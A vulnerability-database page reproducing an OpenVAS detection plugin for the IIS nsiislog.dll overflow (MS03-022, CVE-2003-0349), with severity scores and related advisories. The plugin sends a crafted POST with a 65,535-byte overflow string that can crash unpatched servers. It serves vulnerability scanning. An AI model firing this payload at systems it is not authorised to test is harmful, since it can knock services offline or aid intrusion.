Lucene search
Copyright (C) 2009 Christian Eric EdjengueleOPENVAS:1361412562310101016HistoryMar 16, 2009 - 12:00 a.m.
Microsoft IIS RCE Vulnerability (MS03-022) - Active Check
2009-03-1600:00:00
Copyright (C) 2009 Christian Eric Edjenguele
plugins.openvas.org
21
7.3 High
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.962 High
EPSS
Percentile
99.5%
Microsoft IIS is prone to a remote code execution (RCE)
vulnerability.
# SPDX-FileCopyrightText: 2009 Christian Eric Edjenguele
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
CPE = "cpe:/a:microsoft:internet_information_services";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.101016");
script_version("2024-04-30T05:05:26+0000");
script_tag(name:"last_modification", value:"2024-04-30 05:05:26 +0000 (Tue, 30 Apr 2024)");
script_tag(name:"creation_date", value:"2009-03-16 23:15:41 +0100 (Mon, 16 Mar 2009)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2003-0349");
script_name("Microsoft IIS RCE Vulnerability (MS03-022) - Active Check");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2009 Christian Eric Edjenguele");
script_family("Windows : Microsoft Bulletins");
script_dependencies("gb_microsoft_iis_http_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("microsoft/iis/http/detected");
script_tag(name:"summary", value:"Microsoft IIS is prone to a remote code execution (RCE)
vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP POST request and checks the response.");
script_tag(name:"insight", value:"There is a flaw in the way nsiislog.dll processes incoming
client requests. A vulnerability exists because an attacker could send specially formed HTTP
request (communications) to the server that could cause IIS to fail or execute code on the user's
system.");
script_tag(name:"solution", value:"Microsoft has released a patch to correct these issues.
Please see the references for more information.
Note: This patch can be installed on systems running Microsoft Windows 2000 Service Pack 2,
Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4.
This patch has been superseded by the one provided in Microsoft Security Bulletin MS03-019.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_vul");
script_xref(name:"URL", value:"https://learn.microsoft.com/en-us/security-updates/securitybulletins/2003/ms03-022");
script_xref(name:"URL", value:"http://www.microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE, service:"www" ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
hostname = http_host_name( port:port );
if( ! soc = open_sock_tcp( port ) )
exit( 0 );
remote_exe = "";
url = "/scripts/nsiislog.dll";
req = http_get( item:url, port:port );
send( socket:soc, data:req );
reply = recv( socket:soc, length:4096 );
if( reply ) {
if( "NetShow ISAPI Log Dll" >< reply ) {
url_args = make_list("date", "time",
"c-dns", "cs-uri-stem", "c-starttime", "x-duration", "c-rate",
"c-status", "c-playerid", "c-playerversion", "c-player-language",
"cs(User-Agent)", "cs(Referer)", "c-hostexe");
foreach parameter(url_args)
remote_exe += parameter + "=vttest&";
remote_exe += "c-ip=" + crap(65535);
mpclient = string("POST /", "/scripts/nsiislog.dll", " HTTP/1.0\r\n",
"Host: ", hostname, "\r\n",
"User-Agent: ", "NSPlayer/2.0", "\r\n",
"Content-Type: ", "application/x-www-form-urlencoded", "\r\n",
"Content-Length: ", strlen(remote_exe), "\r\n\r\n");
send( socket:soc, data:mpclient );
response = recv( socket:soc, length:4096 );
if( ( egrep( pattern:"^HTTP/1\.[01] 500", string:response ) ) && ( "The remote procedure call failed. " >< response ) ) {
close( soc );
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
close( soc );
exit( 99 );
}
close( soc );
exit( 0 );
Related
packetstorm
packetstorm
Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
2009-11-26 00:00:00
Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow
2010-07-26 00:00:00
canvas
canvas
Immunity Canvas: MS03_022
2003-07-24 04:00:00
cert
cert
Microsoft Windows Media Services contains buffer overflow in "nsiislog.dll"
2003-07-31 00:00:00
cve
cve
CVE-2003-0349
2003-07-24 04:00:00
checkpoint_advisories
checkpoint_advisories
nessus
nessus
Microsoft Media Services ISAPI nsiislog.dll Multiple Overflows
2003-05-28 00:00:00
openvas
openvas
7.3 High
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.962 High
EPSS
Percentile
99.5%
Related for OPENVAS:1361412562310101016